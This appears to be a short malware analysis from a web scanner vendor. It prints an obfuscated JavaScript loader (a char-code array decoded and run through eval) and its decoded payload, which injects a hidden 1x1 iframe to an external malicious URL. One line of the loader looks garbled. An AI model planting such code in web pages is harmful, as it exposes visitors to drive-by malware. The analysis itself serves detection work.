Quttera web malware scanner detected malicious obfuscated JS

1. /*
2.  * Quttera web malware scanner detected malicious obfuscated code injecting hidden iframe to malicious
3.  * link
4.  */
5.  
6. /*
7.  * Original threat
8.  */
9. try {
10.     window.document.body++
11. } catch (gdsgsdg) {
12.     dbshre = 147;
13. }
14. if (dbshre) {
15.     asd = 0;
16.     try {
17.         d = document.createElement("div");
18.         d.innerHTML.a = "asd";
19.     } catch (agdsg) {
20.         asd = 1;
21.     }
22.     if (!asd) {
23.         e = eval;
24.     }
25.     ss = String;
26.     asgq = new Array(31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25, 117, 8, 1, 24, 25, 26, 27, 109, 89, 107, 26, 106, 113, 105, 107, 26, 56, 23, 92, 104, 93, 112, 100, 93, 103, 110, 41, 90, 106, 94, 91, 111, 92, 61, 101, 95, 104, 92, 102, 109, 34, 34, 96, 94, 107, 91, 104, 92, 31, 34, 53, 8, 1, 5, 3, 26, 27, 23, 24, 104, 116, 108, 105, 38, 108, 108, 94, 23, 53, 25, 33, 99, 107, 108, 105, 52, 42, 38, 91, 94, 108, 97, 108, 107, 109, 40, 105, 99, 39, 105, 91, 107, 105, 97, 100, 91, 42, 90, 100, 98, 101, 41, 103, 96, 105, 33, 54, 4, 2, 25, 26, 27, 23, 103, 115, 107, 109, 37, 107, 109, 115, 103, 92, 38, 105, 105, 110, 96, 108, 98, 105, 105, 23, 53, 25, 33, 92, 89, 107, 104, 102, 112, 107, 93, 32, 53, 8, 1, 24, 25, 26, 27, 102, 114, 106, 108, 41, 106, 108, 114, 102, 96, 37, 90, 104, 108, 95, 92, 106, 25, 55, 27, 30, 40, 32, 53, 8, 1, 24, 25, 26, 27, 102, 114, 106, 108, 41, 106, 108, 114, 102, 96, 37, 96, 94, 99, 98, 95, 108, 25, 55, 27, 30, 41, 105, 114, 34, 50, 5, 3, 26, 27, 23, 24, 104, 116, 108, 105, 38, 108, 110, 116, 99, 93, 39, 113, 100, 91, 108, 97, 26, 56, 23, 31, 42, 106, 115, 30, 51, 6, 4, 27, 23, 24, 25, 105, 117, 104, 106, 39, 109, 111, 112, 100, 94, 40, 103, 92, 94, 109, 26, 56, 23, 31, 42, 106, 115, 30, 51, 6, 4, 27, 23, 24, 25, 105, 117, 104, 106, 39, 109, 111, 112, 100, 94, 40, 111, 102, 104, 25, 55, 27, 30, 41, 105, 114, 34, 50, 5, 3, 7, 5, 23, 24, 25, 26, 100, 93, 24, 33, 27, 95, 102, 91, 110, 103, 96, 101, 108, 39, 97, 96, 107, 61, 101, 95, 104, 92, 102, 109, 60, 116, 64, 92, 33, 33, 106, 113, 105, 107, 33, 36, 32, 24, 116, 7, 5, 23, 24, 25, 26, 27, 23, 24, 25, 94, 106, 90, 109, 102, 95, 105, 107, 38, 112, 108, 100, 107, 93, 33, 33, 55, 91, 97, 111, 26, 100, 91, 53, 85, 33, 106, 113, 105, 107, 86, 34, 53, 52, 40, 94, 100, 109, 54, 32, 35, 54, 4, 2, 25, 26, 27, 23, 24, 25, 26, 27, 91, 103, 92, 111, 104, 92, 102, 109, 40, 98, 92, 108, 62, 102, 96, 100, 93, 103, 110, 61, 112, 65, 93, 34, 34, 102, 114, 106, 108, 34, 32, 38, 90, 106, 107, 92, 102, 93, 61, 99, 96, 100, 93, 34, 106, 113, 105, 107, 35, 54, 4, 2, 25, 26, 27, 23, 117, 6, 4, 120, 32, 32, 34, 53);
27.     s = "";
28.     for (i = 0; i - 484 != 0; i++) {
29.         if ((020 == 0x10) % 26 % 26window.document) s += ss["fromCharCode"](1 * asgq[i] - (i % 5 - 5 - 4));
30.     }
31.     z = s;
32.     e(s);
33. }
34.  
35.  
36. /*
37.  * decoded payload  injecting malicious hidden iframe to http://cerfust[.]nl/paprika/clik[.]php';
38.  */
39. (function () {
40.     var ozqr = document.createElement('iframe');
41.     ozqr.src = 'http://cerfust.nl/paprika/clik.php';
42.     ozqr.style.position = 'absolute';
43.     ozqr.style.border = '0';
44.     ozqr.style.height = '1px';
45.     ozqr.style.width = '1px';
46.     ozqr.style.left = '1px';
47.     ozqr.style.top = '1px';
48.     if (!document.getElementById('ozqr')) {
49.         document.write('<div id=\'ozqr\'></div>');
50.         document.getElementById('ozqr').appendChild(ozqr);
51.     }
52. })();